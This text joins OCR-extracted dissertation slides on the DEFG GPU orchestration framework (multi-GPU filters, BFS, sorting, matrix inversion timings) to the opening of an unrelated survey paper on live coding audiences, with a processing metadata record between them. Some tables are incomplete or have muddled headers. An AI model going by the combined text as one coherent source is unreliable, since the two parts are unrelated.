MEDIAN Application

• The CPU-side DEFG code is very similar to SOBEL
  – An OpenCL kernel was developed for MEDIAN
  – It is more computationally intense
• Performance with the 2-GPU, 5x5 MEDIAN
  – Run-time improvement with all test images
    • Example: a speedup of 1.34 (1.062 s / 0.794 s) with a 7k-by-7k image
  – Handled larger images (22k by 22k) than the 1-GPU version
• Performance analysis with 2 GPUs
  – Kernel execution times dropped
  – OpenCL data-transfer times increased

The row split used by the overlapped multi-GPU filters is sketched below.
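This is an illustrative C++ sketch of the Overlapped-Split-Process-Concatenate idea, assuming a row-wise split with a halo whose radius matches the filter neighborhood (radius 2 for a 5x5 mask); all type and function names here are hypothetical, not DEFG's.

```cpp
#include <algorithm>
#include <vector>

// Each GPU receives its share of the image rows plus a halo of `radius`
// extra rows, so the filter neighborhood is complete at the seams.
struct Slice {
    int srcRow;   // first row copied to the device (includes the halo)
    int rows;     // number of rows copied to the device
    int outRow;   // first row this device actually produces
    int outRows;  // number of output rows concatenated back into the result
};

std::vector<Slice> split_rows(int height, int numGpus, int radius) {
    std::vector<Slice> slices;
    const int base = height / numGpus;
    for (int g = 0; g < numGpus; ++g) {
        int out0 = g * base;
        int out1 = (g == numGpus - 1) ? height : out0 + base;
        int src0 = std::max(0, out0 - radius);       // halo above
        int src1 = std::min(height, out1 + radius);  // halo below
        slices.push_back({src0, src1 - src0, out0, out1 - out0});
    }
    return slices;  // process each slice on its GPU, then concatenate outRows
}
```

For a 100-row image, two GPUs, and radius 2, this yields rows 0–51 on one device and 48–99 on the other, each producing 50 output rows, which matches the "50% of the image plus the overlapped area" description above.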
Breadth-First Search

BFSDP2GPU Application Summary
- Design patterns used in BFSDP2GPU:
  - Multiple-Kernel
  - Multiple-Execution
  - Divide-Process-Merge
  - Prefix-Allocation
- DEFG’s use of the Merrill approach
  - Prefix-scan based buffer allocation
  - “Virtual pointers” to vertices
  - Shared buffers are dense data structures
  - Otherwise, Harish’s sparse data structures were kept

Multiple-GPU BFS Implementation
- The BFSDP2GPU DEFG application
  - Based on the earlier DEFG BFS application
  - The two kernels increased to six
  - Used two GPUs
- A complex OpenCL application
  - Management of shared buffers
  - Run-time communications between the GPUs
- Tested against LVI graphs
  - Test graphs from the SNAP and DIMACS repositories
    - Stanford Network Analysis Package (SNAP) [SNAP2014]
    - Center for Discrete Mathematics and Theoretical Computer Science (DIMACS) [DIMACS2010]
  - Very large graph datasets: millions of vertices and edges

BFSDP2GPU Performance Results
- Compared against the existing DEFG BFS
- Processed large graphs (4.8M vertices, 69M edges)
- Run-time performance was not impressive
  - Run times increased by factors of 6 to 17
  - Issue: OpenCL’s lack of GPU-to-GPU communications (77% of the run time; 0.59 of 0.771 seconds)
  - Lesser issue: the mix of sparse and dense data structures
- External experiment: transfer-rate comparison, CUDA vs. OpenCL
  - CUDA GPU-to-GPU transfers ran at 21 times the OpenCL rate

Roughly Sorting

• Design patterns used in the RSORT application
  – Multiple-Kernel
  – Multiple-Execution
  – Divide-Process-Merge
• GPU sort used: Comb Sort (a sketch follows this list)
  – a sort-in-place design
  – non-recursive
  – similar to Bubble Sort, but much faster
  – elements are compared a gap apart
• Five kernels: LRmax, RLmin, DM, UB, and comb_sort

RSORT Performance

• Comparison over three configurations
  – QSORT on the CPU, a fast sort used as the baseline
  – RSORT with one GPU
  – RSORTM with two GPUs
• Run-time comparisons
  – Generated datasets with set $k$ values
  – Fully perturbed data
• Roughly Sorting’s run times are impressive when $k$ is small
  – At $k = 2000$, with $2^{26}$ items:
    • the two-GPU RSORTM is faster than QSORT
    • the two-GPU versus one-GPU speedup is near 2 (15.36 s / 7.4 s)
    • the second GPU adds sorting capacity
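For reference, here is the comb-sort logic named above as a sequential C++ sketch; the RSORT comb_sort kernel applies the same idea to many independent blocks in parallel.

```cpp
#include <algorithm>
#include <utility>
#include <vector>

// Comb sort: in-place and non-recursive; like Bubble Sort, but elements are
// compared a `gap` apart, with the gap shrinking by a factor of ~1.3 per pass.
void comb_sort(std::vector<int>& a) {
    int gap = static_cast<int>(a.size());
    bool swapped = true;
    while (gap > 1 || swapped) {
        gap = std::max(1, (gap * 10) / 13);   // shrink factor ~1.3
        swapped = false;
        for (std::size_t i = 0; i + gap < a.size(); ++i) {
            if (a[i] > a[i + gap]) {          // compare elements `gap` apart
                std::swap(a[i], a[i + gap]);
                swapped = true;
            }
        }
    }
}
```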
Iterative Matrix Inversion

• Design patterns used in the IMIFLX application
  – Multiple-Kernel
  – BLAS-Usage
• Application characteristics
  – A blend of blas statements and kernels
    • blas statements for matrix multiplication
    • kernels for the simpler matrix operations
  – Multiple blas statements per iteration
  – The anytime operation stops the iterating at the time limit
• Analysis of the application
  – A range of matrices: size and type
  – Inversion iterations
  – Data from the University of Florida Sparse Matrix Collection [UFL2011]

IMIFLX Sample Result

- **Kuu matrix**: 7,102 by 7,102 elements, sparse
- A structural problem with 340,200 non-zero values
- 9 iterations
- Norm value: $\| A R_n - I \|$

Sample IMIFLX Inversion Results

<table>
<thead>
<tr><th>Name</th><th>Type</th><th>Size</th><th>Iterations</th><th>Seconds</th></tr>
</thead>
<tbody>
<tr><td>H2</td><td>Hilbert</td><td>2x2</td><td>4</td><td>0.018</td></tr>
<tr><td>H12</td><td>Hilbert</td><td>12x12</td><td>70</td><td>0.089</td></tr>
<tr><td>M500</td><td>Generated</td><td>500x500</td><td>13</td><td>0.259</td></tr>
<tr><td>M8000</td><td>Generated</td><td>8000x8000</td><td>17</td><td>1380.320</td></tr>
<tr><td>1138_bus</td><td>Repository</td><td>1138x1138</td><td>14</td><td>3.262</td></tr>
<tr><td>Kuu</td><td>Repository</td><td>7102x7102</td><td>9</td><td>605.310</td></tr>
</tbody>
</table>

**Hydra’s NVIDIA T20 GPU**
- Available RAM: 2.68 GB
- Limits the double-precision matrix size to just over 8,000 by 8,000

DEFG Generalization

• HPC with GPUs
  – Note the Faber suggestions for GPU performance:
    • “Get the data on the GPU and leave it”
    • “Give the GPU enough work to do”
    • “Focus on data reuse to avoid memory limits”
  – The CPU becomes the *orchestrator*
• DEFG provides the CPU code to orchestrate
  – Declarations to describe the data
  – Design patterns to describe the orchestration
  – Optimization to minimize the data transfers

Dissertation Accomplishments

• Designed, implemented, and tested DEFG
• Created DEFG’s design patterns
• Compared DEFG to hand-written applications
  – DEFG required less code
  – DEFG produced equal or better run times
• Applied DEFG to diverse GPU applications
  – Each application fully implemented
  – Good application results

Future Research

• Additional DEFG design patterns
  – Multiple-GPU load balancing
  – Resource sharing
• A GPU-side declarative approach
• DEFG enhancements
  – An internal DSL, in addition to the existing external DSL
    • A more-standard programming environment
    • Enables support of more environments
  – Technical improvements
    • Better CPU RAM management
    • Additional collection of run-time statistics
• DEFG support for NVIDIA’s CUDA

References

Additional Slides

DEFG Implementation Metrics

• Lines of code
  – ANTLR-based parser: 580 lines
  – Optimizer: 660 lines of Java
  – Code generator: 1,500 lines of C++
  – Templates and includes: 1,500 lines of C++
• Testing investment: 20% of the total effort
  – Issues tended to be in the C/C++ code generation
  – Most were in the multi-GPU buffer management

## Raw Performance Numbers for Three Applications, in Milliseconds

<table>
<thead>
<tr><th></th><th>CPU</th><th>GPU-Tesla T20</th></tr>
</thead>
<tbody>
<tr><td></td><td>DEFG</td><td>Ref.</td></tr>
<tr><td>BFS-4096</td><td>1.5</td><td>2.6</td></tr>
<tr><td>BFS-65536</td><td>12.3</td><td>14.2</td></tr>
<tr><td>FW</td><td>111.8</td><td>152.0</td></tr>
<tr><td>SOBEL</td><td>23.0</td><td>24.8</td></tr>
</tbody>
</table>

Sample DEFG Code Showing a Sequence

declare application floydwarshall
declare integer NODE_CNT (0)
declare integer BUF_SIZE (0)
declare gpu gpuone ( any )
declare kernel floydWarshallPass FloydWarshall_Kernels ( [[ 2D,NODE_CNT ]] )
declare integer buffer buffer1 ( BUF_SIZE )
        integer buffer buffer2 ( BUF_SIZE )
call init_input (buffer1(in) buffer2(in) NODE_CNT(out) BUF_SIZE(out))
sequence NODE_CNT times
execute run1 floydWarshallPass ( buffer1(inout) buffer2(out) NODE_CNT(in) DEFG_CNT(in) )
call disp_output (buffer1(in) buffer2(in) NODE_CNT(in))
end

Sample DEFG Code for BFS

declare application bfs
declare integer NODE_CNT (0)
declare integer EDGE_CNT (0)
declare integer STOP (0)
declare gpu gpuone ( any )
declare kernel kernel1 bfs_kernel ( [[ 1D,NODE_CNT ]] )
        kernel kernel2 bfs_kernel ( [[ 1D,NODE_CNT ]] )
declare struct (4) buffer graph_nodes ( NODE_CNT )
        integer buffer graph_edges ( EDGE_CNT )
        integer buffer graph_mask ( NODE_CNT )
        integer buffer updating_graph_mask ( NODE_CNT )
        integer buffer graph_visited ( NODE_CNT )
        integer buffer cost ( NODE_CNT )
// note: init_input handles setting the "source" node
call init_input (graph_nodes(out) graph_edges(out) graph_mask(out) updating_graph_mask(out) graph_visited(out) cost(out) NODE_CNT(out) EDGE_CNT(out))
loop
execute part1 kernel1 ( graph_nodes(in) graph_edges(in) graph_mask(in) updating_graph_mask(out) graph_visited(in) cost(inout) NODE_CNT(in) )
// set STOP to zero each time thru...
set STOP (0)
// note: STOP value is returned...
execute part2 kernel2 ( graph_mask(inout) updating_graph_mask(inout) graph_visited(inout) STOP(inout) NODE_CNT(in) )
while STOP eq 1
call disp_output (cost(in) NODE_CNT(in))
end

The host-side control flow this loop implies is sketched below.
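This C++ sketch pictures the orchestration that the generated CPU code must perform for the bfs loop; the wrapper functions are hypothetical stand-ins for the usual OpenCL clSetKernelArg / clEnqueueNDRangeKernel / clEnqueueReadBuffer boilerplate.

```cpp
#include <functional>

// Hypothetical stand-ins for the OpenCL host boilerplate DEFG generates.
struct GpuBuffer { int host_copy = 0; };
void runKernel(const std::function<void()>& k) { k(); }
void writeInt(GpuBuffer& b, int v) { b.host_copy = v; }
int  readInt(const GpuBuffer& b) { return b.host_copy; }

// Control flow of the generated bfs host loop: run kernel1, clear STOP,
// run kernel2 (which raises STOP while the frontier is still growing),
// read STOP back, and repeat -- the DEFG "loop ... while STOP eq 1".
void bfs_host_loop(std::function<void()> part1, std::function<void()> part2,
                   GpuBuffer& stopBuf) {
    int stop;
    do {
        runKernel(part1);         // expand the current frontier, update costs
        writeInt(stopBuf, 0);     // set STOP to zero each time through
        runKernel(part2);         // build the next frontier; may set STOP to 1
        stop = readInt(stopBuf);  // the STOP value is returned by the kernel
    } while (stop == 1);
}
```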
### Table 5.13: Sort Run Times on Hydra with $2^{26}$ Items, in Seconds

<table>
<thead>
<tr><th></th><th></th><th></th><th></th><th></th><th></th></tr>
</thead>
<tbody>
<tr><td>Qsort</td><td>8.394</td><td>8.008</td><td>7.972</td><td>7.922</td><td>7.890</td></tr>
<tr><td>Rsort</td><td>2.527</td><td>11.216</td><td>15.360</td><td>17.120</td><td>29.556</td></tr>
<tr><td>RsortM</td><td>1.459</td><td>6.487</td><td>7.400</td><td>11.189</td><td>24.682</td></tr>
</tbody>
</table>

The unlabeled columns correspond to increasing disorder, from small $k$ to fully perturbed data; the third data column is the $k = 2000$ case quoted earlier (15.360 s for one-GPU Rsort versus 7.400 s for two-GPU RsortM).

### Table 5.14: Sort Run Times on Hydra with $2^{27}$ Items, in Seconds

[Table values not recoverable.]

# IMIFLX Data

## Table 5.16: IMIFLX Inversion Results for Various Matrices

<table>
<thead>
<tr><th>Cnt</th><th>Matrix Name</th><th>Type</th><th>Size</th><th>Epsilon</th><th>Iterations</th><th>Run Time (Seconds)</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>H2</td><td>Hilbert</td><td>2x2</td><td>0.000001</td><td>4</td><td>0.018</td></tr>
<tr><td>2</td><td>H3</td><td>Hilbert</td><td>3x3</td><td>0.000001</td><td>8</td><td>0.022</td></tr>
<tr><td>3</td><td>H4</td><td>Hilbert</td><td>4x4</td><td>0.000001</td><td>12</td><td>0.023</td></tr>
<tr><td>4</td><td>H5</td><td>Hilbert</td><td>5x5</td><td>0.000001</td><td>15</td><td>0.030</td></tr>
<tr><td>5</td><td>H6</td><td>Hilbert</td><td>6x6</td><td>0.000001</td><td>18</td><td>0.034</td></tr>
<tr><td>6</td><td>H7</td><td>Hilbert</td><td>7x7</td><td>0.000001</td><td>21</td><td>0.036</td></tr>
<tr><td>7</td><td>H8</td><td>Hilbert</td><td>8x8</td><td>0.000001</td><td>24</td><td>0.037</td></tr>
<tr><td>8</td><td>H9</td><td>Hilbert</td><td>9x9</td><td>0.000001</td><td>27</td><td>0.042</td></tr>
<tr><td>9</td><td>H10</td><td>Hilbert</td><td>10x10</td><td>0.001</td><td>30</td><td>0.035</td></tr>
<tr><td>10</td><td>H11</td><td>Hilbert</td><td>11x11</td><td>0.005</td><td>40</td><td>0.057</td></tr>
<tr><td>11</td><td>H12</td><td>Hilbert</td><td>12x12</td><td>0.15</td><td>70</td><td>0.089</td></tr>
<tr><td>12</td><td>H13</td><td>Hilbert</td><td>13x13</td><td>n.a.</td><td>n.a.</td><td>#INF error</td></tr>
<tr><td>13</td><td>M500</td><td>Invertible</td><td>500x500</td><td>0.000001</td><td>13</td><td>0.259</td></tr>
<tr><td>13a</td><td>M500</td><td>Invt-AnyTime</td><td>500x500</td><td>0.000001</td><td>10</td><td>0.206</td></tr>
<tr><td>14</td><td>M1000</td><td>Invertible</td><td>1000x1000</td><td>0.000001</td><td>14</td><td>2.112</td></tr>
<tr><td>15</td><td>M5000</td><td>Invertible</td><td>5000x5000</td><td>0.000001</td><td>16</td><td>329.619</td></tr>
<tr><td>16</td><td>M8000</td><td>Invertible</td><td>8000x8000</td><td>0.000001</td><td>17</td><td>1380.320</td></tr>
<tr><td>17</td><td>M8500</td><td>Invertible</td><td>8500x8500</td><td>n.a.</td><td>n.a.</td><td>error -4</td></tr>
<tr><td>18</td><td>685_bus</td><td>Repository</td><td>685x685</td><td>0.000001</td><td>12</td><td>0.665</td></tr>
<tr><td>19</td><td>1138_bus</td><td>Repository</td><td>1138x1138</td><td>0.000001</td><td>14</td><td>3.262</td></tr>
<tr><td>20</td><td>Kuu</td><td>Repository</td><td>7102x7102</td><td>0.000001</td><td>9</td><td>605.310</td></tr>
</tbody>
</table>
# DEFG 4-Way Mini-Experiment SpeedUp

<table>
<thead>
<tr><th>GPUs</th><th>SpeedUp</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>1</td></tr>
<tr><td>2</td><td>1.947</td></tr>
<tr><td>4</td><td>3.622</td></tr>
</tbody>
</table>

[Graph: speedup versus number of GPUs]
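As a quick check on the table, the corresponding parallel efficiencies, $E(p) = S(p)/p$, stay above 90%:

$$E(2) = \frac{1.947}{2} \approx 0.97, \qquad E(4) = \frac{3.622}{4} \approx 0.91.$$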
{"Source-Url": "http://cse.ucdenver.edu:80/~rsenser/aaDefensePresentationFinal.pdf", "len_cl100k_base": 6961, "olmocr-version": "0.1.53", "pdf-total-pages": 51, "total-fallback-pages": 0, "total-input-tokens": 78561, "total-output-tokens": 9360, "length": "2e12", "weborganizer": {"__label__adult": 0.0005021095275878906, "__label__art_design": 0.0008535385131835938, "__label__crime_law": 0.0005497932434082031, "__label__education_jobs": 0.002193450927734375, "__label__entertainment": 0.0001494884490966797, "__label__fashion_beauty": 0.0002899169921875, "__label__finance_business": 0.0002894401550292969, "__label__food_dining": 0.0003986358642578125, "__label__games": 0.0011138916015625, "__label__hardware": 0.006679534912109375, "__label__health": 0.0008707046508789062, "__label__history": 0.0004887580871582031, "__label__home_hobbies": 0.00020825862884521484, "__label__industrial": 0.0010423660278320312, "__label__literature": 0.0003075599670410156, "__label__politics": 0.0003859996795654297, "__label__religion": 0.0007643699645996094, "__label__science_tech": 0.3369140625, "__label__social_life": 0.00013446807861328125, "__label__software": 0.00965118408203125, "__label__software_dev": 0.63427734375, "__label__sports_fitness": 0.0005936622619628906, "__label__transportation": 0.0010213851928710938, "__label__travel": 0.0002551078796386719}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 24773, 0.03248]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 24773, 0.1752]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 24773, 0.74044]], "google_gemma-3-12b-it_contains_pii": [[0, 184, false], [184, 572, null], [572, 1031, null], [1031, 1482, null], [1482, 1806, null], [1806, 2250, null], [2250, 2733, null], [2733, 3244, null], [3244, 3686, null], [3686, 3940, null], [3940, 5027, null], [5027, 5603, null], [5603, 6205, null], [6205, 6707, null], [6707, 6989, null], [6989, 7288, null], [7288, 7681, null], [7681, 7916, null], [7916, 8322, null], [8322, 8771, null], [8771, 9110, null], [9110, 9713, null], [9713, 10002, null], [10002, 10583, null], [10583, 10646, null], [10646, 10794, null], [10794, 11307, null], [11307, 11715, null], [11715, 12067, null], [12067, 12521, null], [12521, 12924, null], [12924, 13474, null], [13474, 13953, null], [13953, 14286, null], [14286, 14529, null], [14529, 14769, null], [14769, 15291, null], [15291, 15473, null], [15473, 16119, null], [16119, 16563, null], [16563, 16898, null], [16898, 17341, null], [17341, 18926, null], [18926, 18944, null], [18944, 19300, null], [19300, 19704, null], [19704, 20307, null], [20307, 21479, null], [21479, 22391, null], [22391, 24607, null], [24607, 24773, null]], "google_gemma-3-12b-it_is_public_document": [[0, 184, true], [184, 572, null], [572, 1031, null], [1031, 1482, null], [1482, 1806, null], [1806, 2250, null], [2250, 2733, null], [2733, 3244, null], [3244, 3686, null], [3686, 3940, null], [3940, 5027, null], [5027, 5603, null], [5603, 6205, null], [6205, 6707, null], [6707, 6989, null], [6989, 7288, null], [7288, 7681, null], [7681, 7916, null], [7916, 8322, null], [8322, 8771, null], [8771, 9110, null], [9110, 9713, null], [9713, 10002, null], [10002, 10583, null], [10583, 10646, null], [10646, 10794, null], [10794, 11307, null], [11307, 11715, null], [11715, 12067, null], [12067, 12521, null], [12521, 12924, null], [12924, 13474, null], [13474, 13953, null], [13953, 14286, null], [14286, 
14529, null], [14529, 14769, null], [14769, 15291, null], [15291, 15473, null], [15473, 16119, null], [16119, 16563, null], [16563, 16898, null], [16898, 17341, null], [17341, 18926, null], [18926, 18944, null], [18944, 19300, null], [19300, 19704, null], [19704, 20307, null], [20307, 21479, null], [21479, 22391, null], [22391, 24607, null], [24607, 24773, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 24773, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 24773, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 24773, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 24773, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 24773, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 24773, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 24773, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 24773, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 24773, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 24773, null]], "pdf_page_numbers": [[0, 184, 1], [184, 572, 2], [572, 1031, 3], [1031, 1482, 4], [1482, 1806, 5], [1806, 2250, 6], [2250, 2733, 7], [2733, 3244, 8], [3244, 3686, 9], [3686, 3940, 10], [3940, 5027, 11], [5027, 5603, 12], [5603, 6205, 13], [6205, 6707, 14], [6707, 6989, 15], [6989, 7288, 16], [7288, 7681, 17], [7681, 7916, 18], [7916, 8322, 19], [8322, 8771, 20], [8771, 9110, 21], [9110, 9713, 22], [9713, 10002, 23], [10002, 10583, 24], [10583, 10646, 25], [10646, 10794, 26], [10794, 11307, 27], [11307, 11715, 28], [11715, 12067, 29], [12067, 12521, 30], [12521, 12924, 31], [12924, 13474, 32], [13474, 13953, 33], [13953, 14286, 34], [14286, 14529, 35], [14529, 14769, 36], [14769, 15291, 37], [15291, 15473, 38], [15473, 16119, 39], [16119, 16563, 40], [16563, 16898, 41], [16898, 17341, 42], [17341, 18926, 43], [18926, 18944, 44], [18944, 19300, 45], [19300, 19704, 46], [19704, 20307, 47], [20307, 21479, 48], [21479, 22391, 49], [22391, 24607, 50], [24607, 24773, 51]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 24773, 0.09139]]}
olmocr_science_pdfs
2024-12-08
2024-12-08
0b149f71d524d2e4cb59fdf6f25636cf22d7d151
This is a repository copy of *Understanding live coding events*.

White Rose Research Online URL for this paper: http://eprints.whiterose.ac.uk/109223/

Version: Accepted Version

**Article:** https://doi.org/10.1080/14794713.2016.1227596

© 2016, Informa UK Limited, trading as Taylor & Francis Group. This is an Accepted Manuscript of a paper published in the International Journal of Performance Arts and Digital Media on 6 Dec 2016, available online at: https://doi.org/10.1080/14794713.2016.1227596. Uploaded in accordance with the publisher's self-archiving policy.

Understanding live coding events

K. Burland* & A. McLean
School of Music, University of Leeds, UK

Karen Burland is Associate Professor of music psychology and Head of the School of Music at the University of Leeds. Her research interests relate to musical identities, the career transitions of musicians, and live music audiences, and she supervises doctoral work primarily in these areas. She is currently a university student education fellow and is investigating the ways in which undergraduate and postgraduate students engage with, and perceive, employability activities during university and beyond. Her book Coughing and Clapping: Investigating Audience Experience, edited with Stephanie Pitts, was published in December 2014. Karen has published widely in well-respected journals and has participated in numerous interdisciplinary research collaborations. Her more recent research focuses on ecological approaches to creativity, understanding interaction and creativity in studio collaborations, and investigations into the impact of institutional values on musicians’ psychological and musical development, in addition to on-going concerns with audience research.

Alex McLean is a live coding musician, digital artist and interdisciplinary researcher based in Sheffield, UK. He is currently completing a research and teaching fellowship at the School of Music, University of Leeds, and beginning work on the five-year PENelope project led by Dr Ellen Harlizius-Klück at the Deutsches Museum Research Institute, investigating weaving as a technical mode of existence. Alex is active across the digital arts, including co-founding the TOPLAP and Algorave live coding movements, the international conferences on Live Interfaces (ICLI) and Live Coding (ICLC), the Sonic Pattern symposia, the Festival of Algorithmic and Mechanical Movement, and the Dorkbot electronic art meetings in Sheffield and London. He also created the TidalCycles live coding environment, now an active free/open source project.

*Corresponding author.
Email: k.burland@leeds.ac.uk

Abstract

As an arts practice, live coding has strong roots in musical performance, and the fact that its ‘liveness’ requires the performer to write and modify algorithms in real time (Collins et al., 2003) means that it is often treated as a kind of music improvisation. Organised live coding has now passed its tenth year (Magnusson, 2014), and during this decade it has been manifested in a variety of contexts. Whilst there is a growing body of research addressing aspects of live coding from the coder’s perspective, little is known about the audiences for these events. This paper seeks to explore the motivations, experiences, and responses of live coding audiences and to examine their perceptions of the role and impact of the projected source code during live coding events. We aim to shed new light on the role of openness and technology in live coding performances, providing rich context for a fuller understanding of this emerging practice and its impact on audience experience.

Keywords: live coding, audience, Algorave, community, learning, code, multimodal

Live coding and audience experience

The central tenet of live coding is the composer-programmer’s execution of sophisticated algorithmic programme skills, musical knowledge and judgement, and the use of mathematical knowledge, experience, and practice to create virtuosic scripting languages and algorithmic techniques.

Live coding involves a risky act of real time programming. It involves expertise in both field of music and mathematics. But one wonders how live coding and its creativities are judged by audiences? (Burnard, 2012, p.177)

A recent surge in audience research highlights the range of factors which influence audience motivations to attend live music events and contribute to their experiences whilst they are there (Burland & Pitts, 2014). Much of this work focuses on classical music traditions (e.g. Dobson & Sloboda, 2014; Pitts, 2014), jazz (Burland & Pitts, 2012), or popular music (Bennett, 2014), but there has been little research to date which has explored audience experiences of live coding events. Much of the previous work relating to audiences suggests that, regardless of genre, audiences are motivated by high quality performances and value opportunities to be situated in close proximity to performers in order to observe the ways in which the instrument is played, or to feel as if they are fully immersed, and perhaps active, in the performance (Burland & Pitts, 2012; Pitts, 2005). Technical mastery and repertoire choices are key drivers for classical audiences (Pitts, 2005), whereas for musics like jazz, the unpredictability of the performance and the sense that they are witness to the creation of music in real time is exciting and appealing to its audiences (Burland & Pitts, 2012). In many ways, it would be logical to expect that much of the appeal of jazz performances also holds true for live coding events; the music is often improvised, created in the moment, and the performers’ awareness of their surroundings can have an impact on the way in which the performance unfolds. One of the unique features of live coding performances, however, is the established practice of projecting code during events (Mori, 2015; Blackwell, 2015); in most other musics the score is hidden from the audience (it is either visible to the performer/s only, or is memorised in advance of the performance) and therefore the process of musical creation is partially hidden.
Blackwell (2015) describes the modes by which users engage with code, suggesting that their activities relate to interpretation, construction and collaboration, and that patterns of use differ according to perspective (e.g., performer, audience). The implication, therefore, is that the projected code is an important part of the audience’s experience, and this is reflected in TOPLAP’s (2004) manifesto, which asks for ‘access to the performer’s mind, to the whole human instrument…show us your screens…the code should be seen as well as heard’. What we do not know, however, is who attends live coding performances and what their motivations to attend might be. We also do not know the extent to which the code contributes to, or detracts from, the audience experience. Is the projected code a pure enhancement to a live coding performance, or are there occasions when it can deter an audience? Are there optimal conditions for the projected screen during live performances? And what role does the coder him/herself play in the audience’s experience of the performance?

Researching live coding events

In order to explore the motivations and experiences of audiences at live coding events, an online survey was created and advertised at a range of Algorave events and on social media over a three-month period, in order to encourage a wide response. As a set of techniques, live coding is not tied to any particular genre, but the current surge in popularity of well attended Algorave-style events provides an opportunity to gain significant understanding of audience response to live coding.¹ However, we should note that this will give a strong bias towards audience responses to algorithmic dance music in particular.

Eighty-three participants completed the survey (66 male, 16 female, 1 other) and the majority of participants were aged 18-45 years. A combination of multiple choice and open-ended questions focused on motivations to attend live coding performances, experiences at events, and the impact of the projected live code. General musical interests and participation in other live music events were also explored (see Appendix). Specifically, we had three main research questions:

1. Why do people choose to attend live coding events?
2. What is the role and impact of the source code?
3. What is the audience’s response to music being visibly created in the moment?

Quantitative data were analysed using descriptive and inferential statistics, and qualitative comments were analysed using Thematic Analysis (Braun & Clarke, 2006). Indicative quotes are used to support the emerging argument, and participant identifiers are indicated by a label such as P1.

---

¹ An algorave is defined as embracing ‘the alien sounds of the raves from the past, and introduc[ing] alien, futuristic rhythms and beats made through strange, algorithm-aided processes’ (Algorave.com/about, n.d.)

Who attends live coding events?

As described above, our audience respondents were primarily male (76%) and aged between 18 and 45 years. The age of the respondents is perhaps unsurprising, especially given a recent survey by The Nielsen Company (2014) which confirms that listeners to electronic dance music (EDM) in the US are aged between 18 and 49 years, the largest majority belonging to the 18-24 year category. As Figure 1 below suggests, however, audiences for live coding events are slightly older than for more mainstream EDM events.
One explanation for this may relate to the nature of live coding events, which perhaps demand something more from their audiences: as discussed in the introduction, the projected code plays an important role in live coding performances and so it is possible that individuals with prior experience of coding or computer programming are particularly attracted to the events (more on this below). Indeed, this suggestion that prior experience motivates attendance is supported by examining the range of respondent professions; 22% worked in ‘IT development’ and were software/hardware/web developers, and many of the ‘academic’ and ‘student’ respondents also identified themselves as having interests in coding – either as part of their work or as a pastime.

What motivates audiences to attend live coding events?

The survey asked respondents about the factors that motivate them to attend and to choose particular events, and these can be seen in Figures 3 and 4 below. It was clear from the open-ended questions that opportunities to attend live coding events were infrequent but that the respondents were keen to attend as often as possible. Since the respondents were generally knowledgeable about either the music or the technology involved, they made choices to attend based on their self-identities as coding enthusiasts; their identities were developed through enjoyable previous experiences and their knowledge of the music, its artists and practices, which facilitated greater immersion in the culture of live coding events.

[Figure 3. Graph showing factors which motivate audiences to attend live coding events]

[Figure 4. Graph showing the factors influencing choice of particular events]

Chi-square analyses of the data suggest that of all of the factors above, there are significant relationships between attendance and the following four factors: liking the artist ($\chi^2(1, N=83) = 5.71$, $p = .017$), enjoying high quality music ($\chi^2(1, N=83) = 9.44$, $p = .002$), enjoying previous events ($\chi^2(1, N=83) = 16.11$, $p < .001$) and being a coding performer ($\chi^2(1, N=83) = 5.19$, $p = .023$). These data further highlight the impact of prior knowledge and skills on motivation to attend live coding events. There was also a relationship between attendance and a lack of desire to try something new ($\chi^2(1, N=83) = 4.27$, $p = .04$), suggesting firstly that audience members identify strongly with live coding events/practices, are clear about their expectations for such events based on their previous experiences (and therefore these are not new experiences any more) and secondly, that a general openness to new experiences does not necessarily characterise a typical audience member – this has to be supplemented by other knowledge or skills. The most significant result above, however, relates to having enjoyed previous events; this finding suggests that there is something special about audience experiences during live coding performances that ‘hooks’ the audience and instils a sense of commitment and enthusiasm.

Experiencing live coding events

Given the profile of the audience considered so far, it is perhaps unsurprising that their enjoyment of live coding performances relates to the nature of the music itself – to its experimental and unpredictable nature, and therefore its sense of being new and unique – as well as to social factors, such as community and learning. In addition to these broad factors, the projected code itself has an additional and important role to play, which will be discussed in further detail below.
The code, learning and community

There is a clear sense from the data that live coding events were characterised by being both ‘cool’ and ‘geeky’ at the same time; these are events which capture the individual’s imagination and demand intellectual engagement. For example, one respondent stated: ‘I find live coding cool, I’m almost mesmerised watching the screen with the code on it and hearing the changes in the music from that’ (P82). Live coding audiences appear to expect (and value) the opportunity to trace the music’s development by watching the code and hearing the resultant changes. This is quite unlike other kinds of musical performances, where the musical score is usually only viewed by the performer (e.g. in classical music) or is fully prepared (or scripted) in advance of the performance (for example, some popular music performances), and this suggests that the processual transparency afforded by the projected code enhances the experience for the audience (there is more discussion about this below).

